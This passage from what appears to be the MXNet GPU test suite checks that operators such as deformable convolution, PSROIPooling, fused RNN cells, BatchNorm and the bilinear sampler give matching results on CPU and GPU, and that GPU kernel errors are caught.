{'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}]
check_consistency(sym, ctx_list, use_uniform=True)
@with_seed()
def test_take_with_type():
sym = mx.sym.take(name='take')
for data_ndim in range(2, 5):
for idx_ndim in range(1, 4):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=3, high=6), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=3, high=5), )
ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.gpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float64,
'take_a': np.float64}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float32,
'take_a': np.float32}},
{'ctx': mx.cpu(0), 'take_indices': idx_shape,
'take_a': data_shape,
'type_dict': {'take_indices': np.float16,
'take_a': np.float16}}]
arg_params = {'take_indices': np.random.randint(low=0,
high=data_shape[0],
size=idx_shape),
'take_a': np.random.normal(size=data_shape)}
check_consistency(sym, ctx_list,
grad_req={'take_indices': 'null',
'take_a': 'write'},
arg_params=arg_params)
def check_rnn_consistency(cell1, cell2):
dshape = (32, 5, 200)
data = mx.sym.Variable('data')
sym1, _ = cell1.unroll(5, data, merge_outputs=True)
mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0))
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None)
sym2, _ = cell2.unroll(5, data, merge_outputs=True)
mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0))
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod1.init_params()
args, auxs = mod1.get_params()
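    # Map cell1's parameter layout onto cell2: unpack into per-cell weight matrices, then
    # repack for cell2, so both modules start from identical weights.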
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[])
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_forget_bias():
forget_bias = 2.0
fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='')
dshape = (32, 1, 20)
data = mx.sym.Variable('data')
sym, _ = fused.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
args, auxs = mod.get_params()
args = fused.unpack_weights(args)
bias_name = next(x for x in args if x.endswith('f_bias'))
expected_bias = forget_bias * np.ones(10, )
assert_allclose(args[bias_name].asnumpy(), expected_bias)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(100, prefix='l0_'))
stack.add(mx.rnn.GRUCell(100, prefix='l1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_bidirectional():
fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='',
bidirectional=True)
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l0_'),
mx.rnn.GRUCell(100, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(100, prefix='l1_'),
mx.rnn.GRUCell(100, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_unfuse():
for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']:
fused = mx.rnn.FusedRNNCell(
100, num_layers=2, mode=mode,
prefix='test_%s'%mode,
bidirectional=True,
dropout=0.5)
stack = fused.unfuse()
check_rnn_consistency(fused, stack)
check_rnn_consistency(stack, fused)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.gpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_psroipooling_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3,
np.dtype(np.float16): 1e-2}
arg_params = {
'deformable_psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# deformable psroipooling
sym = mx.sym.contrib.DeformablePSROIPooling(spatial_scale=0.0625, sample_per_part=4, group_size=3, pooled_size=3,
output_dim=2, trans_std=0.1, no_trans=False, name='deformable_psroipool')
ctx_list = [{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.gpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float64, 'deformable_psroipool_rois': np.float64,
'deformable_psroipool_trans': np.float64}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float32, 'deformable_psroipool_rois': np.float32,
'deformable_psroipool_trans': np.float32}},
{'ctx': mx.cpu(0),
'deformable_psroipool_data': (1, 18, 14, 14),
'deformable_psroipool_rois': (2, 5),
'deformable_psroipool_trans': (2, 4, 3, 3),
'type_dict': {'deformable_psroipool_data': np.float16, 'deformable_psroipool_rois': np.float16,
'deformable_psroipool_trans': np.float16}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_psroipool_data': 'write',
'deformable_psroipool_rois': 'null',
'deformable_psroipool_trans': 'write'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution_with_type():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), name='deformable_conv')
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 10, 10),
'deformable_conv_offset': (2, 18, 8, 8),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, scale=0.1, tol=tol,
grad_req={'deformable_conv_data': 'write',
'deformable_conv_offset': 'write',
'deformable_conv_weight': 'write',
'deformable_conv_bias': 'null'})
@with_seed()
def test_deformable_convolution_options():
tol = {np.dtype(np.float32): 1e-1,
np.dtype(np.float64): 1e-3}
# 2D convolution
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
# Pad > 0
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 7, 7),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), pad=(1,1), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Stride > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.cpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2, name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
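    # 61200 = 3 layers * (4*50*(50+50) gate weights + 8*50 biases), the flat parameter count
    # of this 3-layer, 50-hidden-unit LSTM assuming cuDNN's two-bias-per-gate layout.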
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
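    # 200 chained adds on a ~128 MB float32 tensor would retain ~25 GB of intermediates if
    # autograd kept them all; add's backward needs none of them, so they should be freed.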
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_cross_device_autograd():
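    # The gradient of three chained tanh ops should match whether the intermediates hop
    # between cpu and gpu or the whole chain runs on one context.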
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
            # no 100% guarantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
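# A minimal, generic sketch of the pattern used in test_kernel_error_checking above
# (assumptions: `mp` is the multiprocessing module already imported by this file and
# the 'spawn' start method is available; the helper name is illustrative only): run a
# function that is expected to crash in a separate process so the failure cannot take
# down the main test runner, then report whether the child exited with an error.
def _run_and_expect_failure(func):
    ctx = mp.get_context('spawn')
    child = ctx.Process(target=func)
    child.start()
    child.join()
    # A non-zero exit code means the child raised or aborted, as expected.
    return child.exitcode != 0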
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(),
atol = 1e-3, rtol = 1e-3)
@with_seed()
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
assert_almost_equal(exe_list[ref_idx].outputs[0].asnumpy(), exe.outputs[0].asnumpy(), rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'].asnumpy(), exe_list[ref_idx].grad_dict['data'].asnumpy(), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'].asnumpy(), exe_list[ref_idx].grad_dict['grid'].asnumpy(), rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3.simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'].asnumpy(), exe_list[ref_idx].grad_dict['data'].asnumpy(), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'].asnumpy(), exe_list[ref_idx].grad_dict['grid'].asnumpy(), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'].asnumpy(), data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'].asnumpy(), grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1.simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
